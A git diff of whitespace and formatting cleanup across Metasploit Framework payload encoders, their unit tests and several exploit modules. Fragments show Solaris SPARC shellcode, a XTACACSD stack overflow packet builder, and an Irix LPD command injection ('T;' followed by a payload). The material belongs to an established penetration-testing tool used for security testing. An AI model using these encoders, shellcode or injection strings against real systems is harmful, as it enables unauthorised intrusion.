+# complementary information stored in the third chunk of the decoder.
 #
 # For example, in order to produce 0x01fdfeff one could do the following:
 #
@@ -60,7 +60,7 @@ require 'msf/core'
 # simply fall through into the now-decoded payload that was stored in the
 # third chunk of the decoder.
 #
-# The following is an example encoding of:
+# The following is an example encoding of:
 #
 # "\xcc\x41\xcc\x41\xcc\x41\xcc\x41\xff\xfe\xfd\x01\xff\x02\x82\x4c"
 #
@@ -168,7 +168,7 @@ class Metasploit3 < Msf::Encoder
 buf = try_sub(state, block)
 end
- if (buf.nil?)
+ if (buf.nil?)
 raise BadcharError.new(state.encoded, 0, 0, 0)
 end
@@ -179,11 +179,11 @@ class Metasploit3 < Msf::Encoder
 # Appends the encoded context portion.
 #
 def encode_end(state)
- state.encoded += state.context
+ state.encoded += state.context
 end
 #
- # Generate the instructions that will be used to produce a valid
+ # Generate the instructions that will be used to produce a valid
 # block after decoding using the sub instruction in conjunction with
 # two UTF8/tolower safe values.
 #
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Encoder
 begin
 xv = rand(b - 1) + 1
-
+
 attempts += 1
 # Lame.
@@ -279,4 +279,4 @@ class Metasploit3 < Msf::Encoder
 ((val >= 0x41 and val <= 0x5a) or val >= 0x80) or Rex::Text.badchar_index([val].pack('C'), state.badchars)
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb
index c86572b653..da34b273d8 100644
--- a/modules/encoders/x86/call4_dword_xor.rb
+++ b/modules/encoders/x86/call4_dword_xor.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Encoder::Xor
 # the buffer being encoded
 #
 def decoder_stub(state)
- decoder =
+ decoder =
 Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1),
 Rex::Arch::X86::ECX, state.badchars) +
 "\xe8\xff\xff\xff" + # call $+4
@@ -51,4 +51,4 @@ class Metasploit3 < Msf::Encoder::Xor
 return decoder
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/call4_dword_xor.rb.ut.rb b/modules/encoders/x86/call4_dword_xor.rb.ut.rb
index 8383b549f6..a05cca02d2 100644
--- a/modules/encoders/x86/call4_dword_xor.rb.ut.rb
+++ b/modules/encoders/x86/call4_dword_xor.rb.ut.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 k = Klass.new
 {
- "\x41\x42\x43\x44" =>
+ "\x41\x42\x43\x44" =>
 [
 "\x29\xc9\x83\xe9\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" +
 "\x0e\x66\x30\x86\x84\x83\xee\xfc\xe2\xf4\x27\x72\xc5\xc0",
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 assert_equal(real[0][offset, -1], encoded[offset, -1])
 }
-
+
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb
index 18b61eae68..0e5bcb5a92 100644
--- a/modules/encoders/x86/countdown.rb
+++ b/modules/encoders/x86/countdown.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Encoder::Xor
 # being encoded.
 #
 def decoder_stub(state)
- decoder =
+ decoder =
 Rex::Arch::X86.set(
 Rex::Arch::X86::ECX,
 state.buf.length - 1,
@@ -60,8 +60,8 @@ class Metasploit3 < Msf::Encoder::Xor
 #
 def encode_block(state, block)
 state.context += 1
-
+
 [ block.unpack('C')[0] ^ (state.context - 1) ].pack('C')
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/countdown.rb.ut.rb b/modules/encoders/x86/countdown.rb.ut.rb
index 761d1824a3..1d0119733a 100644
--- a/modules/encoders/x86/countdown.rb.ut.rb
+++ b/modules/encoders/x86/countdown.rb.ut.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 k = Klass.new
 {
- "\xcc\xcc\xcc\xcc" =>
+ "\xcc\xcc\xcc\xcc" =>
 [
 "\x6a\x03\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07" +
 "\xe2\xfa\xcd\xce\xcf\xc8",
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 assert_equal(real[0][offset, -1], encoded[offset, -1])
 }
-
+
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb
index 234599895e..bc18ba9506 100644
--- a/modules/encoders/x86/fnstenv_mov.rb
+++ b/modules/encoders/x86/fnstenv_mov.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -20,9 +20,9 @@ class Metasploit3 < Msf::Encoder::Xor
 'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder',
 'Version' => '$Revision$',
 'Description' => %q{
- This encoder uses a variable-length mov equivalent instruction
+ This encoder uses a variable-length mov equivalent instruction
 with fnstenv for getip.
- },
+ },
 'Author' => 'spoonm',
 'Arch' => ARCH_X86,
 'License' => MSF_LICENSE,
@@ -38,10 +38,10 @@ class Metasploit3 < Msf::Encoder::Xor
 # being encoded.
 #
 def decoder_stub(state)
- decoder =
+ decoder =
 Rex::Arch::X86.set(
 Rex::Arch::X86::ECX,
- (((state.buf.length - 1) / 4) + 1),
+ (((state.buf.length - 1) / 4) + 1),
 state.badchars) +
 "\xd9\xee" + # fldz
 "\xd9\x74\x24\xf4" + # fnstenv [esp - 12]
@@ -55,4 +55,4 @@ class Metasploit3 < Msf::Encoder::Xor
 return decoder
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/fnstenv_mov.rb.ut.rb b/modules/encoders/x86/fnstenv_mov.rb.ut.rb
index 21aa8cc9c4..b9ca2b6e38 100644
--- a/modules/encoders/x86/fnstenv_mov.rb.ut.rb
+++ b/modules/encoders/x86/fnstenv_mov.rb.ut.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 k = Klass.new
 {
- "\xcc\xcc\xcc\xcc" =>
+ "\xcc\xcc\xcc\xcc" =>
 [
 "\x6a\x01\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e" +
 "\x33\x75\x05\x83\xeb\xfc\xe2\xf4\xf2\xff\xb9\xc9",
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 assert_equal(real[0][offset, -1], encoded[offset, -1])
 }
-
+
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb
index 7c7c35d30f..e78373b84d 100644
--- a/modules/encoders/x86/jmp_call_additive.rb
+++ b/modules/encoders/x86/jmp_call_additive.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -28,20 +28,20 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
 'License' => MSF_LICENSE,
 'Decoder' =>
 {
- 'Stub' =>
- "\xfc" + # cld
- "\xbbXORK" + # mov ebx, key
- "\xeb\x0c" + # jmp short 0x14
- "\x5e" + # pop esi
- "\x56" + # push esi
- "\x31\x1e" + # xor [esi], ebx
- "\xad" + # lodsd
- "\x01\xc3" + # add ebx, eax
- "\x85\xc0" + # test eax, eax
- "\x75\xf7" + # jnz 0xa
- "\xc3" + # ret
- "\xe8\xef\xff\xff\xff", # call 0x8
- 'KeyOffset' => 2,
+ 'Stub' =>
+ "\xfc" + # cld
+ "\xbbXORK" + # mov ebx, key
+ "\xeb\x0c" + # jmp short 0x14
+ "\x5e" + # pop esi
+ "\x56" + # push esi
+ "\x31\x1e" + # xor [esi], ebx
+ "\xad" + # lodsd
+ "\x01\xc3" + # add ebx, eax
+ "\x85\xc0" + # test eax, eax
+ "\x75\xf7" + # jnz 0xa
+ "\xc3" + # ret
+ "\xe8\xef\xff\xff\xff", # call 0x8
+ 'KeyOffset' => 2,
 'KeySize' => 4,
 'BlockSize' => 4,
 })
diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb
index afd8c99ef6..39588fa2ed 100644
--- a/modules/encoders/x86/nonalpha.rb
+++ b/modules/encoders/x86/nonalpha.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -25,8 +25,8 @@ class Metasploit3 < Msf::Encoder::NonAlpha
 'Description' => %q{
 Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls,
- but will fail isalpha(). Table based design from
- Russel Sanford.
+ but will fail isalpha(). Table based design from
+ Russel Sanford.
 },
 'Author' => [ 'pusscat'],
 'Arch' => ARCH_X86,
diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb
index a890d7475f..93b5f4f3e7 100644
--- a/modules/encoders/x86/nonupper.rb
+++ b/modules/encoders/x86/nonupper.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Encoder::NonUpper
 #
 def encode_block(state, block)
 begin
- newchar, state.key, state.decoder_key_size =
+ newchar, state.key, state.decoder_key_size =
 Rex::Encoder::NonUpper::encode_byte(datastore['badchars'], block.unpack('C')[0], state.key, state.decoder_key_size)
 rescue RuntimeError => e
 # This is a bandaid to deal with the fact that, since it's in
diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb
index 26b3106315..a6c2388bc5 100644
--- a/modules/encoders/x86/shikata_ga_nai.rb
+++ b/modules/encoders/x86/shikata_ga_nai.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
 # Cache this decoder stub. The reason we cache the decoder stub is
 # because we need to ensure that the same stub is returned every time
- # for a given encoder state.
+ # for a given encoder state.
 state.decoder_stub = block
 end
@@ -76,22 +76,22 @@ protected
 #
 def fpu_instructions
 fpus = []
-
+
 0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
 0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
 0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
 0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
 0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }
-
+
 fpus << "\xd9\xd0"
 fpus << "\xd9\xe1"
 fpus << "\xd9\xf6"
 fpus << "\xd9\xf7"
 fpus << "\xd9\xe5"
-
+
 # This FPU instruction seems to fail consistently on Linux
 #fpus << "\xdb\xe1"
-
+
 fpus
 end
@@ -104,7 +104,7 @@ protected
 count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
 addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')
 key_reg = nil
-
+
 if state.context_encoding
 key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
 else
@@ -119,7 +119,7 @@ protected
 *fpu_instructions)
 fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
 "\xd9\x74\x24\xf4")
-
+
 # Get EIP off the stack
 popeip = Rex::Poly::LogicalBlock.new('popeip',
 Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
@@ -177,9 +177,9 @@ protected
 Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
 Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
 Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })
-
+
 # Loop instruction block
- loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
+ loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
 "\xe2\xf5")
 # Define block dependencies
@@ -195,4 +195,4 @@ protected
 Rex::Arch::X86::ECX ], nil, state.badchars)
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb
index 7bfa84461b..8760344903 100644
--- a/modules/encoders/x86/single_static_bit.rb
+++ b/modules/encoders/x86/single_static_bit.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -21,7 +21,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Encoder
 # This encoder has a manual ranking because it should only be used in cases
- # where information has been explicitly supplied, specifically
+ # where information has been explicitly supplied, specifically
 # BitNumber and BitValue.
 Rank = ManualRanking
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Encoder
 'License' => MSF_LICENSE,
 'EncoderType' => Msf::Encoder::Type::SingleStaticBit
 )
-
+
 # this shouldn't be present in the decoder stub.
 @key_marker = 0x1010
 end
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Encoder
 # next_dst_byte:
 inner_loop << next_byte
 # next_bit:
- # I really wish this silly padding wasn't necessary, however removing the bad characters in the
+ # I really wish this silly padding wasn't necessary, however removing the bad characters in the
 # jump/call displacements has proven difficult otherwise.
 inner_loop << "\x90" * 0x1a # nops - for padding (so relative jumps don't have badchars)
 len = -1 * (inner_loop.length+2)
@@ -146,11 +146,11 @@ class Metasploit3 < Msf::Encoder
 bit_num = (datastore['BitNumber'] || 5).to_i
 bit_num = (7-bit_num)
 bit_val = (datastore['BitValue'] || true)
-
+
 encoded = ''
 new_byte = 0
 nbits = 0
-
+
 block.unpack('C*').each do |ch|
 7.step(0,-1) do |x|
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Encoder
 new_byte <<= 1 if nbits > 0
 new_byte |= 1 if bit_val
 nbits += 1
-
+
 # do we have a full byte?
 if nbits == 8
 encoded << new_byte.chr
@@ -181,7 +181,7 @@ class Metasploit3 < Msf::Encoder
 end
 end
 end
-
+
 # if we have bits left, pad out to a whole byte
 if nbits > 0
 while nbits < 8
@@ -191,7 +191,7 @@ class Metasploit3 < Msf::Encoder
 end
 encoded << new_byte.chr
 end
-
+
 return encoded
 end
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Encoder
 #
 def encode_end(state)
 state.encoded += state.context
-
+
 xor_key = 0
 xor_key_str = ''
 enc_len_str = ''
@@ -212,9 +212,9 @@ class Metasploit3 < Msf::Encoder
 next if has_badchars?(enc_len_str, state.badchars)
 break
 end
-
+
 marker_str = [@key_marker].pack('v')
-
+
 state.encoded.sub!(marker_str, enc_len_str)
 state.encoded.sub!(marker_str, xor_key_str)
 end
diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb
index 63e9da28e0..4de2078cb6 100644
--- a/modules/encoders/x86/unicode_mixed.rb
+++ b/modules/encoders/x86/unicode_mixed.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 'Name' => "Alpha2 Alphanumeric Unicode Mixedcase Encoder",
 'Version' => '$Revision$',
 'Description' => %q{
- Encodes payloads as unicode-safe mixedcase text. This encoder uses
+ Encodes payloads as unicode-safe mixedcase text. This encoder uses
 SkyLined's Alpha2 encoding suite.
 },
 'Author' => [ 'pusscat', 'skylined' ],
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 if (not reg)
 raise RuntimeError, "Need BufferRegister"
 end
- Rex::Encoder::Alpha2::UnicodeMixed::gen_decoder(reg, offset)
+ Rex::Encoder::Alpha2::UnicodeMixed::gen_decoder(reg, offset)
 end
 #
@@ -71,4 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum
 Rex::Text.to_unicode(buffer)
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb
index 7cd63b3257..2da99a6b84 100644
--- a/modules/encoders/x86/unicode_upper.rb
+++ b/modules/encoders/x86/unicode_upper.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 if (not reg)
 raise RuntimeError, "Need BufferRegister"
 end
- Rex::Encoder::Alpha2::UnicodeUpper::gen_decoder(reg, offset)
+ Rex::Encoder::Alpha2::UnicodeUpper::gen_decoder(reg, offset)
 end
 #
@@ -71,4 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum
 Rex::Text.to_unicode(buffer)
 end
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb
index 6d3c893c7d..995e6eb48e 100644
--- a/modules/exploits/dialup/multi/login/manyargs.rb
+++ b/modules/exploits/dialup/multi/login/manyargs.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -16,19 +20,19 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
 'Description' => %q{
- This exploit connects to a system's modem over dialup and exploits
+ This exploit connects to a system's modem over dialup and exploits
 a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.
 },
- 'References' =>
- [
- [ 'CVE', '2001-0797'],
- [ 'OSVDB', '690'],
- [ 'OSVDB', '691'],
- [ 'BID', '3681'],
- [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
- [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
- ],
+ 'References' =>
+ [
+ [ 'CVE', '2001-0797'],
+ [ 'OSVDB', '690'],
+ [ 'OSVDB', '691'],
+ [ 'BID', '3681'],
+ [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
+ [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
+ ],
 'Version' => '$Revision$',
 'Author' =>
 [
@@ -37,30 +41,30 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_TTY, 'Platform' => ['unix'], 'License' => MSF_LICENSE, - 'Payload' => - { - 'Space' => 3000, - 'BadChars' => '', - 'DisableNops' => true, - }, - 'Targets' => - [ - ['Solaris 2.6 - 8 (SPARC)', { - 'Platform' => 'unix', - 'Ret' => 0x00027184, - # Solaris/SPARC special shellcode (courtesy of inode) - # execve() + exit() - 'Shellcode' => - "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + - "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + - "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + - "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", - 'NOP' => "\x90\x1b\x80\x0e", - } ], - - ], - 'DefaultTarget' => 0 - )) + 'Payload' => + { + 'Space' => 3000, + 'BadChars' => '', + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'Solaris 2.6 - 8 (SPARC)', + { + 'Platform' => 'unix', + 'Ret' => 0x00027184, + # Solaris/SPARC special shellcode (courtesy of inode) + # execve() + exit() + 'Shellcode' => + "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + + "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + + "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + + "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", + 'NOP' => "\x90\x1b\x80\x0e", + } + ], + ], + 'DefaultTarget' => 0)) register_options( [ @@ -168,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Waiting for login prompt") res = dialup_expect(/ogin:\s/i, 10) - #puts Rex::Text.to_hex_dump(res[:buffer]) + #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Login prompt not found... Exiting.") disconnect_dialup 
@@ -196,18 +200,18 @@ class Metasploit3 < Msf::Exploit::Remote
 # wait for password prompt
 print_status("Waiting for password prompt")
 res = dialup_expect(/assword:/i, 30)
- #puts Rex::Text.to_hex_dump(res[:buffer])
- if not res[:match]
+ #puts Rex::Text.to_hex_dump(res[:buffer])
+ if not res[:match]
 print_error("Target is likely not vulnerable... Exiting.")
 disconnect_dialup
 return
- end
+ end
 print_status("Password prompt received, waiting for shell")
 dialup_puts("pass\n")
 res = dialup_expect(/#\s/i, 20)
- #puts Rex::Text.to_hex_dump(res[:buffer])
+ #puts Rex::Text.to_hex_dump(res[:buffer])
 if not res[:match]
 print_error("Shell not found.")
 print_error("Target is likely not vulnerable... Exiting.")
diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
index 53b6fa5ff7..b6c0cf41ae 100644
--- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
+++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -11,7 +11,6 @@
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking
@@ -23,13 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in XTACACSD <= 4.1.2. By - sending a specially crafted XTACACS packet with an overly long - username, an attacker may be able to execute arbitrary code. + sending a specially crafted XTACACS packet with an overly long + username, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-7232'], ['OSVDB', '58140'], ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'], @@ -43,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'BSD', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, 'Targets' => [ ['FreeBSD 6.2-Release Bruteforce', @@ -60,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 8 2008')) - register_options([Opt::RPORT(49)], self.class) - + register_options([Opt::RPORT(49)], self.class) end def brute_exploit(address) @@ -81,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x00\x00\x00\x00" # Result 2 sploit << "\x00\x00" # Result 3 sploit << make_nops(238 - payload.encoded.length) - sploit << payload.encoded + [address['Ret']].pack('V') + sploit << payload.encoded + [address['Ret']].pack('V') - print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") + print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 86239cd8a3..a11527d090 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb 
@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Irix LPD tagprinter Command Execution', 'Description' => %q{ - This module exploits an arbitrary command execution flaw in - the in.lpd service shipped with all versions of Irix. + This module exploits an arbitrary command execution flaw in + the in.lpd service shipped with all versions of Irix. }, 'Author' => [ 'optyx', 'hdm' ], 'License' => MSF_LICENSE, @@ -46,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet', } - }, - 'Targets' => + }, + 'Targets' => [ [ 'Automatic Target', { }] ], 'DisclosureDate' => 'Sep 01 2001', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(515) - ], self.class) + + register_options( + [ + Opt::RPORT(515) + ], self.class) end def check @@ -65,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("T;uname -a;\n") resp = sock.get_once disconnect - + if (resp =~ /IRIX/) print_status("Response: #{resp.strip}") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect sock.put("T;#{payload.encoded};\n") diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 1eba790a3f..3a862516be 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb 
@@ -3,39 +3,35 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Description' => %q{ - - This is an exploit for the GameSpy secure query in - the Unreal Engine. + This is an exploit for the GameSpy secure query in + the Unreal Engine. - This exploit only requires one UDP packet, which can - be both spoofed and sent to a broadcast address. - Usually, the GameSpy query server listens on port 7787, - but you can manually specify the port as well. + This exploit only requires one UDP packet, which can + be both spoofed and sent to a broadcast address. + Usually, the GameSpy query server listens on port 7787, + but you can manually specify the port as well. - The RunServer.sh script will automatically restart the - server upon a crash, giving us the ability to - bruteforce the service and exploit it multiple - times. - + The RunServer.sh script will automatically restart the + server upon a crash, giving us the ability to + bruteforce the service and exploit it multiple + times. }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, 
